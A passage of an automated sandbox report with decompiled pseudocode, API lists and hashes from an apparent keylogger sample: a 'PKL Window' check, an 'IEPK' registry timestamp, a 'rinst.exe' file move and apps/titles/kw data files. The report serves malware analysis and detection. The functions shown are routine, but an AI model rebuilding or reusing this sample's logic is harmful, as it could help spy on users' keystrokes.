				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E0043EBEA(GetModuleHandleA(0), _t39, 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0043E92A();
				return _t41;
			}

0x0043e7b1
0x0043e7b3
0x0043e7b8
0x0043e7c3
0x0043e7c4
0x0043e7d1
0x0043e7d6
0x0043e7db
0x0043e7e2
0x0043e7e9
0x0043e7f0
0x0043e7f6
0x0043e7fc
0x0043e7fe
0x0043e804
0x0043e80a
0x0043e813
0x0043e818
0x0043e81d
0x0043e823
0x0043e82a
0x0043e830
0x0043e831
0x0043e836
0x0043e83b
0x0043e840
0x0043e845
0x0043e84a
0x0043e85b
0x0043e863
0x0043e869
0x0043e86e
0x0043e873
0x0043e880
0x0043e882
0x0043e888
0x0043e8c4
0x0043e8c9
0x0043e8ca
0x0043e8ca
0x0043e88a
0x0043e88a
0x0043e88a
0x0043e88b
0x0043e88e
0x0043e890
0x0043e89b
0x0043e89d
0x0043e89d
0x0043e89e
0x0043e89e
0x0043e89b
0x0043e8a1
0x0043e8a5
0x00000000
0x00000000
0x0043e8ab
0x0043e8b2
0x0043e8bc
0x0043e8d1
0x0043e8be
0x0043e8be
0x0043e8be
0x0043e8dd
0x0043e8e2
0x0043e8e6
0x0043e8ec
0x0043e8f1
0x0043e8f3
0x0043e8f6
0x0043e8f7
0x0043e8f8
0x0043e8ff

APIs

__set_app_type.MSVCRT ref: 0043E7DB
__p__fmode.MSVCRT ref: 0043E7F0
__p__commode.MSVCRT ref: 0043E7FE
__setusermatherr.MSVCRT ref: 0043E82A
_initterm.MSVCRT ref: 0043E840
__getmainargs.MSVCRT ref: 0043E863
_initterm.MSVCRT ref: 0043E873
GetStartupInfoA.KERNEL32(?), ref: 0043E8B2
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0043E8D6
exit.MSVCRT ref: 0043E8E6
_XcptFilter.MSVCRT ref: 0043E8F8

Strings

x0E, xrefs: 0043E85B, 0043E85E

Memory Dump Source

Source File: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID: x0E
API String ID: 801014965-2085839638
Opcode ID: e7dd650148b2fe74a2056c2f5baa759a34c30b5d846dd67d4226bd3d2f355def
Instruction ID: 89c94ea11fe09d787872c420172ef89c5e72238c03ee7e205053d29131b361ca
Opcode Fuzzy Hash: e7dd650148b2fe74a2056c2f5baa759a34c30b5d846dd67d4226bd3d2f355def
Instruction Fuzzy Hash: 084192B5C41304AFDB24AFA5D845BAEBBB8FB0A711F20112BF451972E2C7385941CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00403E5A, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E00403E5A(void* __eax) {

				_push("None");
				L0043DE26(); // executed
				_push("User defined");
				L0043DE26();
				_push("Open");
				L0043DE26();
				_push("Print");
				L0043DE26();
				_push("Explore");
				L0043DE26();
				_push("E-mail");
				L0043DE26();
				return __eax;
			}

0x00403e5a
0x00403e64
0x00403e69
0x00403e73
0x00403e78
0x00403e82
0x00403e87
0x00403e91
0x00403e96
0x00403ea0
0x00403ea5
0x00403eaf
0x00403eb4

APIs

#537.MFC42(None,00403E55), ref: 00403E64
#537.MFC42(User defined), ref: 00403E73
#537.MFC42(Open,User defined), ref: 00403E82
#537.MFC42(Print,Open,User defined), ref: 00403E91
#537.MFC42(Explore,Print,Open,User defined), ref: 00403EA0
#537.MFC42(E-mail,Explore,Print,Open,User defined), ref: 00403EAF

Strings

Open, xrefs: 00403E78
E-mail, xrefs: 00403EA5
Explore, xrefs: 00403E96
Print, xrefs: 00403E87
User defined, xrefs: 00403E69
None, xrefs: 00403E5A

Memory Dump Source

Source File: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537
String ID: E-mail$Explore$None$Open$Print$User defined
API String ID: 4256512136-3616938308
Opcode ID: 959191443967752294bf1c8485ad417a71694dd1c26598fc0b660d6dde99f856
Instruction ID: 64710185d3577561e7c7c7004b869488be4ffdb627771f0b9110906d498d8a1a
Opcode Fuzzy Hash: 959191443967752294bf1c8485ad417a71694dd1c26598fc0b660d6dde99f856
Instruction Fuzzy Hash: 70D0AC00F44E519646147E65E43363D5C42DB9CBC7B90E15FBE011E1D38D8C4A5C456D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B04D, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E0041B04D(signed long long __fp0) {
				void* _v8;
				int _v12;
				char _v16;
				int _v20;
				int _v24;
				void* _v28;
				char _v32;
				long _t34;
				void* _t43;
				char* _t47;
				signed long long* _t48;
				void* _t51;
				signed long long _t54;

				_t54 = __fp0;
				E0041B133( &_v32);
				_v12 = 0;
				__imp__time( &_v16);
				_v20 = 8;
				_v24 = 0;
				RegCreateKeyA(0x80000001, "Software\\Microsoft\\Internet Explorer",  &_v8); // executed
				_t47 = "IEPK";
				_t34 = RegQueryValueExA(_v8, _t47, 0,  &_v24,  &_v32,  &_v20); // executed
				if(_t34 == 0) {
					_v12 = 1;
				}
				if(_v28 <= 0) {
					L4:
					_v28 = 0;
				} else {
					_t51 = _v28 - 5;
					if(_t51 > 0) {
						goto L4;
					}
				}
				__imp__difftime(_v16, _v32);
				 *_t48 = _t54;
				L0043E7A2();
				asm("fcom qword [0x448138]");
				_pop(_t43);
				asm("fnstsw ax");
				asm("sahf");
				if(_t51 > 0 || _v12 == 0) {
					 *_t48 = _t54 /  *0x448138;
					__imp__floor(_t43, _t43);
					L0043E7A8();
					_t18 =  &_v28;
					 *_t18 = _v28 - _t34;
					if( *_t18 < 0) {
						_v28 = 0;
					}
					_v32 = _v16;
					RegSetValueExA(_v8, _t47, 0, 3,  &_v32, 8); // executed
				} else {
					st0 = _t54;
				}
				RegCloseKey(_v8); // executed
				return _v28;
			}

0x0041b04d
0x0041b058
0x0041b063
0x0041b066
0x0041b07b
0x0041b082
0x0041b085
0x0041b08e
0x0041b0a1
0x0041b0a9
0x0041b0ab
0x0041b0ab
0x0041b0b5
0x0041b0bd
0x0041b0bd
0x0041b0b7
0x0041b0b7
0x0041b0bb
0x00000000
0x00000000
0x0041b0bb
0x0041b0c6
0x0041b0cc
0x0041b0cf
0x0041b0d4
0x0041b0db
0x0041b0dc
0x0041b0de
0x0041b0df
0x0041b0ee
0x0041b0f1
0x0041b0f9
0x0041b0fe
0x0041b0fe
0x0041b101
0x0041b103
0x0041b103
0x0041b10b
0x0041b119
0x0041b121
0x0041b121
0x0041b121
0x0041b126
0x0041b132

APIs

Part of subcall function 0041B133: memset.MSVCRT ref: 0041B13B
Part of subcall function 0041B133: time.MSVCRT ref: 0041B141

time.MSVCRT ref: 0041B066
RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer,?), ref: 0041B085
RegQueryValueExA.KERNELBASE(?,IEPK,00000000,?,?,00000008), ref: 0041B0A1
difftime.MSVCRT ref: 0041B0C6
fabs.MSVCRT ref: 0041B0CF
floor.MSVCRT ref: 0041B0F1
_ftol.MSVCRT ref: 0041B0F9
RegSetValueExA.KERNELBASE(?,IEPK,00000000,00000003,00000008,00000008), ref: 0041B119
RegCloseKey.KERNELBASE(?), ref: 0041B126

Strings

IEPK, xrefs: 0041B08E, 0041B09D, 0041B115
Software\Microsoft\Internet Explorer, xrefs: 0041B071

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Valuetime$CloseCreateQuery_ftoldifftimefabsfloormemset
String ID: IEPK$Software\Microsoft\Internet Explorer
API String ID: 3648909903-794077097
Opcode ID: 054e1dab8a170a6eec95439f53497395ea0cf1d95403ba9bfc77f9d2b517b44e
Instruction ID: dd149e372030552be21860354a8f79e15778c8bb59483b7b631a6047370fe913
Opcode Fuzzy Hash: 054e1dab8a170a6eec95439f53497395ea0cf1d95403ba9bfc77f9d2b517b44e
Instruction Fuzzy Hash: 40217A75C00209EFDB11AF91EC89AEFBFB8FF85355F20406BE151A1190DB391A85DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041FE1D, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E0041FE1D(intOrPtr* __ecx, void* __eflags, void* __fp0) {
				struct HWND__* _t20;
				intOrPtr _t22;
				struct HWND__* _t26;
				void* _t33;
				void* _t35;
				int _t36;
				struct HWND__* _t37;
				intOrPtr* _t39;
				intOrPtr* _t47;
				void* _t52;
				void* _t57;

				_t57 = __eflags;
				_t39 = __ecx;
				E0043E4E0(0x441e27, _t52);
				E0043E690(0x37f0, __ecx);
				_t47 = _t39; // executed
				E0041FF1D(_t57); // executed
				_t20 = FindWindowA(0, "PKL Window"); // executed
				if(_t20 == 0) {
					E00428827();
					_t22 = E00428AD2(__eflags);
					 *0x4558cc = _t22; // executed
					L0043E44A(); // executed
					_t36 = 8;
					memset(_t52 - 0x14, 0, _t36);
					 *(_t52 - 0x14) = _t36;
					 *((intOrPtr*)(_t52 - 0x10)) = 0x2ff;
					__imp__InitCommonControlsEx(_t52 - 0x14, 0, _t35);
					_push(0);
					_push(0xefefef);
					L0043E444(); // executed
					_t26 = GetForegroundWindow(); // executed
					_t37 = _t26; // executed
					E00420972(_t52 - 0x37fc, __eflags, __fp0, 0); // executed
					_push(0);
					_push(0x66);
					 *(_t52 - 4) = 0;
					 *((intOrPtr*)(_t47 + 0x20)) = _t52 - 0x37fc;
					L0043E0BA(); // executed
					__eflags = IsWindow(_t37);
					if(__eflags != 0) {
						SetForegroundWindow(_t37);
					}
					 *((intOrPtr*)( *_t47 + 0x5c))();
					 *(_t52 - 4) =  *(_t52 - 4) | 0xffffffff;
					E00420C62(_t52 - 0x37fc, __eflags);
					_t33 = 0;
					__eflags = 0;
				} else {
					_t33 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
				return _t33;
			}

0x0041fe1d
0x0041fe1d
0x0041fe22
0x0041fe2c
0x0041fe33
0x0041fe35
0x0041fe42
0x0041fe4a
0x0041fe54
0x0041fe59
0x0041fe5f
0x0041fe64
0x0041fe6e
0x0041fe72
0x0041fe7d
0x0041fe80
0x0041fe88
0x0041fe8e
0x0041fe8f
0x0041fe96
0x0041fe9b
0x0041fea8
0x0041feaa
0x0041feb5
0x0041feb6
0x0041febe
0x0041fec1
0x0041fec4
0x0041fed0
0x0041fed2
0x0041fed5
0x0041fed5
0x0041fedf
0x0041fee2
0x0041feec
0x0041fef1
0x0041fef1
0x0041fe4c
0x0041fe4c
0x0041fe4c
0x0041fef9
0x0041ff01

APIs

__EH_prolog.LIBCMT ref: 0041FE22

Part of subcall function 0041FF1D: __EH_prolog.LIBCMT ref: 0041FF22
Part of subcall function 0041FF1D: #924.MFC42(?,004558C8,rinst.exe), ref: 0041FF53
Part of subcall function 0041FF1D: #800.MFC42(?,004558C8,rinst.exe), ref: 0041FF6D
Part of subcall function 0041FF1D: #924.MFC42(?,004558C8,rinst.exe,?,004558C8,rinst.exe), ref: 0041FF7C
Part of subcall function 0041FF1D: MoveFileA.KERNEL32 ref: 0041FF8A
Part of subcall function 0041FF1D: #800.MFC42 ref: 0041FF93

FindWindowA.USER32 ref: 0041FE42
#1247.MFC42(00000000), ref: 0041FE64
memset.MSVCRT ref: 0041FE72
InitCommonControlsEx.COMCTL32(?), ref: 0041FE88
#5943.MFC42(00EFEFEF,00000000), ref: 0041FE96
GetForegroundWindow.USER32(00EFEFEF,00000000), ref: 0041FE9B
#2086.MFC42(00000066,00000000,00000000), ref: 0041FEC4
IsWindow.USER32(00000000), ref: 0041FECA
SetForegroundWindow.USER32(00000000), ref: 0041FED5

Strings

PKL Window, xrefs: 0041FE3C

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Window$#800#924ForegroundH_prolog$#1247#2086#5943CommonControlsFileFindInitMovememset
String ID: PKL Window
API String ID: 1413088479-2321334418
Opcode ID: 974c1365f4282ca79d03f2d9861de1b0a566cf65b3c0a2acc5b3228025964557
Instruction ID: caff68ceb3a8d2f4b609b75cc9c9dbe2ddcdf9559007ec67d11399ce8f7a5a3c
Opcode Fuzzy Hash: 974c1365f4282ca79d03f2d9861de1b0a566cf65b3c0a2acc5b3228025964557
Instruction Fuzzy Hash: 7621DAB5A01316AFC710FBB2DC4A9AFBB78FF48354F10443BB005D2192DB788A04CA69

Uniqueness

Uniqueness Score: -1.00%

Function 0042211B, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E0042211B(void* __ecx, void* __eflags) {
				void* _t28;
				void* _t43;

				E0043E4E0(0x442378, _t43);
				_push(__ecx);
				_push(__ecx);
				_push("apps.dat");
				_push(0x4558c8);
				_push(_t43 - 0x10);
				L0043DE20();
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				E00428731(__ecx + 0x3e8,  *((intOrPtr*)(_t43 - 0x10))); // executed
				 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
				L0043DD36();
				_push("titles.dat");
				_push(0x4558c8);
				_push(_t43 - 0x10);
				L0043DE20();
				 *(_t43 - 4) = 1;
				E00428731(__ecx + 0x89c,  *((intOrPtr*)(_t43 - 0x10))); // executed
				 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
				L0043DD36();
				_push("kw.dat");
				_push(0x4558c8);
				_push(_t43 - 0x14);
				L0043DE20();
				 *(_t43 - 4) = 2;
				_t28 = E00428731(__ecx + 0x1204,  *((intOrPtr*)(_t43 - 0x14))); // executed
				 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return _t28;
			}

0x00422120
0x00422125
0x00422126
0x0042212e
0x00422136
0x00422139
0x0042213a
0x00422141
0x0042214b
0x00422150
0x00422157
0x0042215c
0x00422164
0x00422165
0x00422166
0x00422173
0x0042217a
0x0042217f
0x00422186
0x0042218b
0x00422193
0x00422194
0x00422195
0x004221a2
0x004221a9
0x004221ae
0x004221b5
0x004221bf
0x004221c7

APIs

__EH_prolog.LIBCMT ref: 00422120
#924.MFC42(?,004558C8,apps.dat,004558C8,?,?,?,00420B20,?,00000000,00000000), ref: 0042213A

Part of subcall function 00428731: __EH_prolog.LIBCMT ref: 00428736
Part of subcall function 00428731: #533.MFC42(?,004558C8,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00428746
Part of subcall function 00428731: #350.MFC42(?,004558C8,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00428753
Part of subcall function 00428731: #540.MFC42(?,004558C8,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0042875F
Part of subcall function 00428731: #860.MFC42(00000000,?,004558C8,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0042877B
Part of subcall function 00428731: #540.MFC42(00000000,?,004558C8,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00428787
Part of subcall function 00428731: #5194.MFC42(?,00000000,?,00000000,?,004558C8,00000000), ref: 0042879B
Part of subcall function 00428731: #5465.MFC42(?,?,00000000,?,00000000,?,004558C8,00000000), ref: 004287AB
Part of subcall function 00428731: #1997.MFC42(?,?,00000000,?,00000000,?,004558C8,00000000), ref: 004287C9
Part of subcall function 00428731: #800.MFC42(?,?,00000000,?,00000000,?,004558C8,00000000), ref: 004287D5
Part of subcall function 00428731: #800.MFC42(?,00000000,?,00000000,?,004558C8,00000000), ref: 004287FC
Part of subcall function 00428731: #798.MFC42(?,00000000,?,00000000,?,004558C8,00000000), ref: 0042880F

#800.MFC42(00000000,?,004558C8,apps.dat,004558C8,?,?,?,00420B20,?,00000000,00000000), ref: 00422157
#924.MFC42(?,004558C8,titles.dat,00000000,?,004558C8,apps.dat,004558C8,?,?,?,00420B20,?,00000000,00000000), ref: 00422166

Part of subcall function 00428731: #800.MFC42(?,00000000,?,00000000,?,004558C8,00000000), ref: 004287ED

#800.MFC42(00000000,?,004558C8,titles.dat,00000000,?,004558C8,apps.dat,004558C8,?,?,?,00420B20,?,00000000,00000000), ref: 00422186
#924.MFC42(?,004558C8,kw.dat,00000000,?,004558C8,titles.dat,00000000,?,004558C8,apps.dat,004558C8,?,?,?,00420B20), ref: 00422195
#800.MFC42(00000000,?,004558C8,kw.dat,00000000,?,004558C8,titles.dat,00000000,?,004558C8,apps.dat,004558C8), ref: 004221B5

Strings

x#D, xrefs: 0042211B
apps.dat, xrefs: 0042212E
kw.dat, xrefs: 0042218B
titles.dat, xrefs: 0042215C

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#924$#540H_prolog$#1997#350#5194#533#5465#798#860
String ID: apps.dat$kw.dat$titles.dat$x#D
API String ID: 130924112-1639675152
Opcode ID: 194966762dea3a33e290ea1194b6e2799e2960421b3c2f96fd8797e038408eee
Instruction ID: 4fdbcaa8750ee0019b169620ce86efcfb64211fc8a04741e778e3f296c24d19e
Opcode Fuzzy Hash: 194966762dea3a33e290ea1194b6e2799e2960421b3c2f96fd8797e038408eee
Instruction Fuzzy Hash: CA119130901515EBCB14EFA1DD06AEEFB78EF19368F20461EB021630D1DB782A14DA68

Uniqueness

Uniqueness Score: -1.00%

Function 00403E2F, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E00403E2F(signed int __eax, void* __ebx, signed int __ecx, void* __edi) {

				if(__ebx == 0) {
					 *__eax =  *__eax + __eax;
					 *((intOrPtr*)(__eax + 0x34)) =  *((intOrPtr*)(__eax + 0x34)) + __ecx;
					_push("None");
					L0043DE26(); // executed
					_push("User defined");
					L0043DE26();
					_push("Open");
					L0043DE26();
					_push("Print");
					L0043DE26();
					_push("Explore");
					L0043DE26();
					_push("E-mail");
					L0043DE26();
					return __eax;
				} else {
					asm("stosb");
					return (__eax | __ecx) +  *(__eax | __ecx);
				}
			}

0x00403e31
0x00403e57
0x00403e59
0x00403e5a
0x00403e64
0x00403e69
0x00403e73
0x00403e78
0x00403e82
0x00403e87
0x00403e91
0x00403e96
0x00403ea0
0x00403ea5
0x00403eaf
0x00403eb4
0x00403e33
0x00403e36
0x00403e3b
0x00403e3b

APIs

#537.MFC42(None,00403E55), ref: 00403E64
#537.MFC42(User defined), ref: 00403E73
#537.MFC42(Open,User defined), ref: 00403E82
#537.MFC42(Print,Open,User defined), ref: 00403E91
#537.MFC42(Explore,Print,Open,User defined), ref: 00403EA0
#537.MFC42(E-mail,Explore,Print,Open,User defined), ref: 00403EAF

Strings

Open, xrefs: 00403E78
E-mail, xrefs: 00403EA5
Explore, xrefs: 00403E96
Print, xrefs: 00403E87
User defined, xrefs: 00403E69

Memory Dump Source

Source File: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537
String ID: E-mail$Explore$Open$Print$User defined
API String ID: 4256512136-311612163
Opcode ID: 68c20a54a95c0b657dc1114f85bc6d1867cf2b277db078f8276378c23660a588
Instruction ID: 73cf33b5ddf5fa1b7dce1ba4b4089a695e8bcbe9cbfc87a3bc914db13a9e42e7
Opcode Fuzzy Hash: 68c20a54a95c0b657dc1114f85bc6d1867cf2b277db078f8276378c23660a588
Instruction Fuzzy Hash: 0AE03000E08E809B8714BE65E4376692E11CAD9B87754A15FFD411F1D38E4C491C422D

Uniqueness

Uniqueness Score: -1.00%

Function 00403E41, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E00403E41(signed int __eax, void* __ebx, signed int __ecx) {

